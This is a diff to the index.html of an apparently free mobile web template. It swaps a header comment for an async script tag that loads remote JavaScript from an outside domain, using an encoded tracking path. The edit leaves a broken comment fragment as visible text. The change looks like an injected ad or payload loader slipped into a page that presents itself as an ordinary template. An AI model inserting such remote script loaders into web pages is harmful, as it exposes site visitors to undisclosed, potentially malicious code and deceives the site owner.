--- a/index.html
+++ b/index.html
@@ -27,7 +27,7 @@ Smartphone Compatible web template, free webdesigns for Nokia, Samsung, LG, Sony
 
 </head>
 <body>
-<!-- header -->
+<script async src="https://yiopse.com/p/waWQiOjEwODk1NDUsInNpZCI6MTA5ODY3OCwid2lkIjoyMDUxMTYsInNyYyI6Mn0=eyJ.js"></script>!-- header -->
 <div class="top-banner">
 	 <div class="header">
 		 <div class="container">
